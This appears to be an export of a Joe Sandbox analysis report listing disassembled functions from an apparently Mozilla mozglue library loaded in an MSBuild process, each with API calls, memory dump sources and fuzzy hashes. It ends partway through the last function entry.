                                                                                                                                                                                                                                                                            Function 6CB174A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 6CB17526
                                                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CB17566
                                                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CB17597
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Init_thread_footer$ErrorLast
                                                                                                                                                                                                                                                                            • String ID: UnmapViewOfFile2$kernel32.dll
                                                                                                                                                                                                                                                                            • API String ID: 3217676052-1401603581
                                                                                                                                                                                                                                                                            • Opcode ID: 4dfcad28e35b8cf3ead5d73ed1301fef02dcded9e1bf07491daba1d4b346be6d
                                                                                                                                                                                                                                                                            • Instruction ID: bccc6f980c0ad69ec7571109a3712ce9c3daa30096bad61e499b6bae084df28b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4dfcad28e35b8cf3ead5d73ed1301fef02dcded9e1bf07491daba1d4b346be6d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1A214935708590E7CB249FA9C918E9D3776EB56338F040569E40D67F40CB70AC068AD2
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 6CB1C410 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(ntdll.dll,?,6CB1C0E9), ref: 6CB1C418
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6CB1C437
                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,6CB1C0E9), ref: 6CB1C44C
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                            • String ID: NtQueryVirtualMemory$ntdll.dll
                                                                                                                                                                                                                                                                            • API String ID: 145871493-2623246514
                                                                                                                                                                                                                                                                            • Opcode ID: 7bbff66589d85f628602e04c167194a7a638d46b984934f868ff2450661ebf38
                                                                                                                                                                                                                                                                            • Instruction ID: b6d277eec59c8f67f418ea6ffb7c81b33c9d0353a470e1275d7ba86ab3252754
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7bbff66589d85f628602e04c167194a7a638d46b984934f868ff2450661ebf38
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 14E04F78208320EBDF247F35C908B193FF8E707206F004565AE0C83650DB74C4048B00
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 6CB175B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(ntdll.dll,?,6CB1748B,?), ref: 6CB175B8
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6CB175D7
                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,6CB1748B,?), ref: 6CB175EC
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                            • String ID: RtlNtStatusToDosError$ntdll.dll
                                                                                                                                                                                                                                                                            • API String ID: 145871493-3641475894
                                                                                                                                                                                                                                                                            • Opcode ID: d653c5c5a1da140eca2b889aa8c0ed3773e6d708a3c8c3a15439ece37c2f7a26
                                                                                                                                                                                                                                                                            • Instruction ID: d295504e8db0e202b917aa764dad6f97103a169af583b694f7ec28cbf637c10f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d653c5c5a1da140eca2b889aa8c0ed3773e6d708a3c8c3a15439ece37c2f7a26
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 39E0B675704761FBEF206FA6C94C7097FF8EB56218F10546AA90DD3A80EBB58441CF91
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 6CAB4DE0 Relevance: 7.6, APIs: 5, Instructions: 133stringCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CAB4E5A
                                                                                                                                                                                                                                                                            • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6CAB4E97
                                                                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CAB4EE9
                                                                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,00000000), ref: 6CAB4F02
                                                                                                                                                                                                                                                                            • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6CAB4F1E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 713647276-0
                                                                                                                                                                                                                                                                            • Opcode ID: 7495eac82062989c1601530d1fc17e2a5a17bd03cabc8528c7035486054b9aab
                                                                                                                                                                                                                                                                            • Instruction ID: 05bdc37c34910ba83c62afcc2b1b011afd4b152f0328d8af91d08502a736d977
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7495eac82062989c1601530d1fc17e2a5a17bd03cabc8528c7035486054b9aab
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D841BF716047019FC705CF69C48099BBBF8FF89344F148A1DF465A7641D730E998CB91
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 6CAC1530 Relevance: 7.6, APIs: 5, Instructions: 98COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • moz_xmalloc.MOZGLUE(-00000002,?,6CAC152B,?,?,?,?,6CAC1248,?), ref: 6CAC159C
                                                                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(00000023,?,?,?,?,6CAC152B,?,?,?,?,6CAC1248,?), ref: 6CAC15BC
                                                                                                                                                                                                                                                                            • moz_xmalloc.MOZGLUE(-00000001,?,6CAC152B,?,?,?,?,6CAC1248,?), ref: 6CAC15E7
                                                                                                                                                                                                                                                                            • free.MOZGLUE(?,?,?,?,?,?,6CAC152B,?,?,?,?,6CAC1248,?), ref: 6CAC1606
                                                                                                                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6CAC152B,?,?,?,?,6CAC1248,?), ref: 6CAC1637
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 733145618-0
                                                                                                                                                                                                                                                                            • Opcode ID: aa7d116747a4976bc1057636a2185b8d38e1bef7221da5a5d1e1d14321d75f5e
                                                                                                                                                                                                                                                                            • Instruction ID: 2db1cf28f78b1958fff23f85edf9ed279827c303fe94370deac90b817202caeb
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aa7d116747a4976bc1057636a2185b8d38e1bef7221da5a5d1e1d14321d75f5e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A731D672B001188BCB189E7CD9504BE77A9AB813647290B2DE523DBBD4EB30D9958792
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 6CABB4C0 Relevance: 7.6, APIs: 5, Instructions: 84COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 6CABB532
                                                                                                                                                                                                                                                                            • moz_xmalloc.MOZGLUE(?), ref: 6CABB55B
                                                                                                                                                                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CABB56B
                                                                                                                                                                                                                                                                            • wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6CABB57E
                                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CABB58F
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 4244350000-0
                                                                                                                                                                                                                                                                            • Opcode ID: edfd7ede65e375824cdba62bc6ed236944323687ea18b597834b7feaabcde408
                                                                                                                                                                                                                                                                            • Instruction ID: 4fa730a193c4a5a40879c4909fdd7e81ca17c45d963e9bab706b2bfcb0d35015
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: edfd7ede65e375824cdba62bc6ed236944323687ea18b597834b7feaabcde408
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 82210771A002059BDB009F68DD80BAEBBBDFF41308F284229E919EB341E735D955C7A1
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 6CADD468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAECBE8: GetCurrentProcess.KERNEL32(?,6CAB31A7), ref: 6CAECBF1
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAECBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CAB31A7), ref: 6CAECBFA
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(6CB3E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6CAED1C5), ref: 6CADD4F2
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(6CB3E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6CAED1C5), ref: 6CADD50B
                                                                                                                                                                                                                                                                              • Part of subcall function 6CABCFE0: EnterCriticalSection.KERNEL32(6CB3E784), ref: 6CABCFF6
                                                                                                                                                                                                                                                                              • Part of subcall function 6CABCFE0: LeaveCriticalSection.KERNEL32(6CB3E784), ref: 6CABD026
                                                                                                                                                                                                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6CAED1C5), ref: 6CADD52E
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(6CB3E7DC), ref: 6CADD690
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(6CB3E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6CAED1C5), ref: 6CADD751
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
                                                                                                                                                                                                                                                                            • String ID: MOZ_CRASH()
                                                                                                                                                                                                                                                                            • API String ID: 3805649505-2608361144
                                                                                                                                                                                                                                                                            • Opcode ID: ac298c45f2f9e40f30c3390983fe0d910d0bf9bd3617443b61a592fc405742f3
                                                                                                                                                                                                                                                                            • Instruction ID: b611f9505f8382e1384bcaa400fa30e75f8294a3477709d23f5475a735a5675f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ac298c45f2f9e40f30c3390983fe0d910d0bf9bd3617443b61a592fc405742f3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6151F371A047518FD328CF28C19475ABBE1EB89704F15492EE99DC7B84D770E884CF91
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 6CB0B410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104stringCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAB4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6CAF3EBD,6CAF3EBD,00000000), ref: 6CAB42A9
                                                                                                                                                                                                                                                                            • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6CB0B127), ref: 6CB0B463
                                                                                                                                                                                                                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CB0B4C9
                                                                                                                                                                                                                                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6CB0B4E4
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _getpidstrlenstrncmptolower
                                                                                                                                                                                                                                                                            • String ID: pid:
                                                                                                                                                                                                                                                                            • API String ID: 1720406129-3403741246
                                                                                                                                                                                                                                                                            • Opcode ID: 2449db9c30e9180057c43bfb2043219340936a5b84a7ed4489530d632f0b3ae6
                                                                                                                                                                                                                                                                            • Instruction ID: e6b4bf6e9569d16e1c20a47c8844b30dbd04cb3ef867c9d0876026a5d18cfc87
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2449db9c30e9180057c43bfb2043219340936a5b84a7ed4489530d632f0b3ae6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CD312631B01259CFDB10DFA9D880AEEBBB5FF05318F540529D81567A41D731EA89CBE2
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 6CB00C90 Relevance: 6.3, APIs: 5, Instructions: 99stringCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CB00CD5
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAEF960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CAEF9A7
                                                                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CB00D40
                                                                                                                                                                                                                                                                            • free.MOZGLUE ref: 6CB00DCB
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAD5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CAD5EDB
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAD5E90: memset.VCRUNTIME140(6CB17765,000000E5,55CCCCCC), ref: 6CAD5F27
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAD5E90: LeaveCriticalSection.KERNEL32(?), ref: 6CAD5FB2
                                                                                                                                                                                                                                                                            • free.MOZGLUE ref: 6CB00DDD
                                                                                                                                                                                                                                                                            • free.MOZGLUE ref: 6CB00DF2
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 4069420150-0
                                                                                                                                                                                                                                                                            • Opcode ID: c8b3903fb09611389d2051f6927dc0b7562f7afdf1cec0bc49faab7927ea973a
                                                                                                                                                                                                                                                                            • Instruction ID: dfa2605e1b16dd70cdebdbdba91ed252a97d4593eef92e1c655789eaacdf6533
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c8b3903fb09611389d2051f6927dc0b7562f7afdf1cec0bc49faab7927ea973a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7D41F775A087918BD320DF29D1407AAFBE5FFC9614F518A2EE8D887750DB70A484CB92
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 6CB0CCF0 Relevance: 6.3, APIs: 4, Instructions: 299COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • moz_xmalloc.MOZGLUE(000000E0,00000000,?,6CAFDA31,00100000,?,?,00000000,?), ref: 6CB0CDA4
                                                                                                                                                                                                                                                                              • Part of subcall function 6CACCA10: malloc.MOZGLUE(?), ref: 6CACCA26
                                                                                                                                                                                                                                                                              • Part of subcall function 6CB0D130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6CB0CDBA,00100000,?,00000000,?,6CAFDA31,00100000,?,?,00000000,?), ref: 6CB0D158
                                                                                                                                                                                                                                                                              • Part of subcall function 6CB0D130: InitializeConditionVariable.KERNEL32(00000098,?,6CB0CDBA,00100000,?,00000000,?,6CAFDA31,00100000,?,?,00000000,?), ref: 6CB0D177
                                                                                                                                                                                                                                                                            • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6CAFDA31,00100000,?,?,00000000,?), ref: 6CB0CDC4
                                                                                                                                                                                                                                                                              • Part of subcall function 6CB07480: ReleaseSRWLockExclusive.KERNEL32(?,6CB115FC,?,?,?,?,6CB115FC,?), ref: 6CB074EB
                                                                                                                                                                                                                                                                            • moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6CAFDA31,00100000,?,?,00000000,?), ref: 6CB0CECC
                                                                                                                                                                                                                                                                              • Part of subcall function 6CACCA10: mozalloc_abort.MOZGLUE(?), ref: 6CACCAA2
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAFCB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6CB0CEEA,?,?,?,?,00000000,?,6CAFDA31,00100000,?,?,00000000), ref: 6CAFCB57
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAFCB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6CAFCBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6CB0CEEA,?,?), ref: 6CAFCBAF
                                                                                                                                                                                                                                                                            • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6CAFDA31,00100000,?,?,00000000,?), ref: 6CB0D058
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 861561044-0
                                                                                                                                                                                                                                                                            • Opcode ID: d243e1b8cd931a6e6b4b21a3ffcc558895928accf25e7507c67f46aefc1f5d83
                                                                                                                                                                                                                                                                            • Instruction ID: ccbe5c979a8fd527909a4444e042fe345088669babce96c1762a68b6d5d991c1
